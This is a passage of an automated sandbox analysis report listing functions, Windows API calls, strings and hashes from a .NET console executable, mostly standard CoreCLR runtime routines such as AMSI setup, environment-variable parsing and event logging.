                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GC_VersionInfo), ref: 010257D4
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GC_Initialize), ref: 01025826
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeHeapProc$ErrorLastwcscpy_s
                                                                                                                                                                                                                          • String ID: GC_Initialize$GC_VersionInfo
                                                                                                                                                                                                                          • API String ID: 2550415743-311598099
                                                                                                                                                                                                                          • Opcode ID: d9df7d05f6e1c85a5d66c1d8ee806f63b7a6e77631a62104db958022a88645fd
                                                                                                                                                                                                                          • Instruction ID: ba0339785992151db3938fd50409c8dbb36f3083fea27011fc32b7a060431dbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9df7d05f6e1c85a5d66c1d8ee806f63b7a6e77631a62104db958022a88645fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A771CBB19002289BDB21DF18DC49BEEBBB4FF48310F1441D9E889AB290EB745E54CF95
                                                                                                                                                                                                                          Function 0117FAB0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AmsiInitialize), ref: 0117FB69
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AmsiScanBuffer), ref: 0117FB9B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,7CAB6A82,0000002C,00000000,00000024), ref: 0117FBC8
                                                                                                                                                                                                                            • Part of subcall function 00FDF1E0: DeleteCriticalSection.KERNEL32(00000000,?,7CAB6A82,016456A4,80004005), ref: 00FDF228
                                                                                                                                                                                                                            • Part of subcall function 00FDF1E0: HeapFree.KERNEL32(00000000,00000000,7CAB6A82,016456A4,80004005,?,?,?,?,?,?,?,?,00000000,014E8AB5,000000FF), ref: 00FDF24D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCriticalProcSection$DeleteFreeHeapLeave
                                                                                                                                                                                                                          • String ID: AmsiInitialize$AmsiScanBuffer$amsi.dll$coreclr
                                                                                                                                                                                                                          • API String ID: 2465865910-2862599151
                                                                                                                                                                                                                          • Opcode ID: 8ad326af1f3684a44f09bbd9a31c68f764887820fc1dc39f43a6da03466f75aa
                                                                                                                                                                                                                          • Instruction ID: b1550d10a7e509a630802aa8c15bd0490cb35cd880091c800a6807b95e3cdd58
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ad326af1f3684a44f09bbd9a31c68f764887820fc1dc39f43a6da03466f75aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A51D075A403469FEB358F69DC84BAFBBB4FB04B11F000169EC21A3380DB75AC028B90
                                                                                                                                                                                                                          Function 0121B040 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • towlower.API-MS-WIN-CRT-STRING-L1-1-0(00000043,00000000,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B05E
                                                                                                                                                                                                                          • towlower.API-MS-WIN-CRT-STRING-L1-1-0(00000044,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B06A
                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B07A
                                                                                                                                                                                                                          • towlower.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B0A1
                                                                                                                                                                                                                            • Part of subcall function 01223640: LCMapStringEx.KERNEL32(0159B9F0,00000200,00000003,00000001,?,00000001,00000000,00000000,00000000), ref: 01223729
                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B1A0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: towlower$EnvironmentFreeStrings_errno$HeapStringwcstoul
                                                                                                                                                                                                                          • String ID: COMPlus_$DOTNET_
                                                                                                                                                                                                                          • API String ID: 2914145733-1316173318
                                                                                                                                                                                                                          • Opcode ID: d64ef249b7590fb3a00a9a301d0a22ef3c6de150b7e4d40a0961726cf6d340d5
                                                                                                                                                                                                                          • Instruction ID: 20ea8a5066ab091dc7cb3797db00fa3372b30437092d4f516ef47a0e4128b0e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d64ef249b7590fb3a00a9a301d0a22ef3c6de150b7e4d40a0961726cf6d340d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1541E635E2021BABEB21EB5C88117FF77FAEF64350F850055EA45DB288EB719941C790
                                                                                                                                                                                                                          Function 010E27C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(7CAB6A82,?,00000000), ref: 010E27F2
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 010E2829
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 010E2869
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 010E28EA
                                                                                                                                                                                                                            • Part of subcall function 00FCD660: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD68B
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 010E28A4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ResumeThread, xrefs: 010E281D
                                                                                                                                                                                                                          • %s failed with error %u. Handle: 0x%p, xrefs: 010E281E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFreeHeapMultiWide$ErrorLast_swprintf
                                                                                                                                                                                                                          • String ID: %s failed with error %u. Handle: 0x%p$ResumeThread
                                                                                                                                                                                                                          • API String ID: 378439020-1438827283
                                                                                                                                                                                                                          • Opcode ID: 6b819da8171fa92ea9e26c3f56a64c648043188ebbc81d96291ff943ad80405b
                                                                                                                                                                                                                          • Instruction ID: 4f7e3dfea18ff737c59e437e83ee3057bdbbd8efaac3c44d4e0b7c72de0344c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b819da8171fa92ea9e26c3f56a64c648043188ebbc81d96291ff943ad80405b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8319471A01228AFE7309B65DC49F9BBBACFB05720F5402ADF919A72D0EB745904CB90
                                                                                                                                                                                                                          Function 01185180 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegisterEventSourceW.ADVAPI32(00000000,.NET Runtime), ref: 011851FA
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,010D4A6F), ref: 01185206
                                                                                                                                                                                                                          • ReportEventW.ADVAPI32(00000000,00000001,00000000,000003FF,00000000,00000001,00000000,016371B8,00000000), ref: 01185222
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,010D4A6F), ref: 0118522A
                                                                                                                                                                                                                          • DeregisterEventSource.ADVAPI32(00000000), ref: 01185233
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • .NET Runtime, xrefs: 011851F3
                                                                                                                                                                                                                          • EventReporter::Report: Event log is full, corrupt or not enough memory to process., xrefs: 0118526D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Event$ErrorLastSource$DeregisterRegisterReport
                                                                                                                                                                                                                          • String ID: .NET Runtime$EventReporter::Report: Event log is full, corrupt or not enough memory to process.
                                                                                                                                                                                                                          • API String ID: 2240410200-2109140546
                                                                                                                                                                                                                          • Opcode ID: c6babc0d8754a25c9aefa47e01e6818dbe765fd7d118be74c31685ccc430c611
                                                                                                                                                                                                                          • Instruction ID: 40c0816e90312655876d92e9723a052d36596bae94848b03b1e9d45a9d07b28b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6babc0d8754a25c9aefa47e01e6818dbe765fd7d118be74c31685ccc430c611
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821F971B40211EBF668B668CC49B3D7697EB84351F064079FF09A7390DF7598014B52
                                                                                                                                                                                                                          Function 012D5260 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,?,012CD80A,80020139,00000000,00000000,?,?,?,?,?,?,012CDA55,?), ref: 012D5273
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018,?,00000000,?,?,012CD80A,80020139,00000000,00000000), ref: 012D5290
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,?,012CD80A,80020139,00000000,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82), ref: 012D52CB
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(012CD80A,?,012CD80A,80020139,00000000,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82), ref: 012D52E2
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012D52FA
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012D530A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 012D52CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap_strdupfree$AllocProcess
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 3838182309-930870680
                                                                                                                                                                                                                          • Opcode ID: 975bac6bff1eec1becbd6c028694e478ac8822c84956e6866763d903d476e4a3
                                                                                                                                                                                                                          • Instruction ID: b21ab0cf2440dda5cde895c72dccf9ba3aae1e093a05c9668d48c8793517287f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 975bac6bff1eec1becbd6c028694e478ac8822c84956e6866763d903d476e4a3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED219CB1B107069BEB318F79EC44A16BBA8BF94651F00853EFA49C7310EBB0D454CBA1
                                                                                                                                                                                                                          Function 010D3BE0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,Error 0x%08x.BreakOnBadExit: returning bad exit code.,80131506,80131506,?), ref: 010D3C80
                                                                                                                                                                                                                          • DebugBreak.KERNEL32 ref: 010D3C92
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(80131506,80131506,?), ref: 010D3CB3
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 010D3CBA
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 010D3CCB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error 0x%08x.BreakOnBadExit: returning bad exit code., xrefs: 010D3C79
                                                                                                                                                                                                                          • SafeExitProcess: exitCode = %d sca = %d, xrefs: 010D3BFF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$BreakCurrentDebugExitTerminate__acrt_iob_func
                                                                                                                                                                                                                          • String ID: Error 0x%08x.BreakOnBadExit: returning bad exit code.$SafeExitProcess: exitCode = %d sca = %d
                                                                                                                                                                                                                          • API String ID: 4023824191-4137208948
                                                                                                                                                                                                                          • Opcode ID: ba0b159ca5b94742f3e73e7328e4c83486c6baf8c12c3336fdee404048397904
                                                                                                                                                                                                                          • Instruction ID: 0284cfe4122e44c8f6cf294e1d716618a84680c842414436869811ced79113c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba0b159ca5b94742f3e73e7328e4c83486c6baf8c12c3336fdee404048397904
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 232167B46003156FEB70A72ED80CFAA7BD8AF41301F05409DEA489B291EB759811C7A3
                                                                                                                                                                                                                          Function 0122A940 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0122A820: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0122A8C3
                                                                                                                                                                                                                            • Part of subcall function 0122A820: HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 0122A8F7
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0122A99C
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0122A9A3
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,010851AE,(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0,7CAB6A82,00000000), ref: 0122A9AA
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,010851AE,(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0,7CAB6A82,00000000), ref: 0122A9B1
                                                                                                                                                                                                                            • Part of subcall function 01226D20: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0159BAA1,000000FF,00000000,00000000,7CAB6A82), ref: 01226D8A
                                                                                                                                                                                                                            • Part of subcall function 01226D20: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,0159BAA1,000000FF,00000000,00000000,00000000), ref: 01226DBF
                                                                                                                                                                                                                            • Part of subcall function 01226D20: OutputDebugStringW.KERNEL32(00000000), ref: 01226DD4
                                                                                                                                                                                                                            • Part of subcall function 01226D20: HeapFree.KERNEL32(00000000,00000000), ref: 01226DF4
                                                                                                                                                                                                                            • Part of subcall function 01006650: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,0159D670,0122A9EB,0159D670,00000000), ref: 01006658
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ASSERT:%s, line:%d, xrefs: 0122AA00
                                                                                                                                                                                                                          • CLR: Assert failure(PID %d [0x%08x], Thread: %d [0x%x]): %s File: %s, Line: %d Image:%s, xrefs: 0122A9BB
                                                                                                                                                                                                                          • D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 0122A998, 0122A9FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ByteCharFreeHeapMultiProcessThreadWide$DebugFileModuleNameOutputString__acrt_iob_func
                                                                                                                                                                                                                          • String ID: ASSERT:%s, line:%d$CLR: Assert failure(PID %d [0x%08x], Thread: %d [0x%x]): %s File: %s, Line: %d Image:%s$D:\a\_work\1\s\src\coreclr\vm\threads.cpp
                                                                                                                                                                                                                          • API String ID: 700304197-3825138699
                                                                                                                                                                                                                          • Opcode ID: 7922f2ad7a6a8f3704c05d12cc3f7baa85a0f9faad4e74d35d8329bea18f60aa
                                                                                                                                                                                                                          • Instruction ID: adabfd6cdfb1431e8c1abeb30c451ee47677981d4ca099f14a2cbe121f34164b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7922f2ad7a6a8f3704c05d12cc3f7baa85a0f9faad4e74d35d8329bea18f60aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD1160B1920125BACB14EBA5DD4AFEFBA7DBF58701F00042CF505E35A1EA785904D7A1
                                                                                                                                                                                                                          Function 00FCE0B0 Relevance: 12.2, APIs: 8, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE166
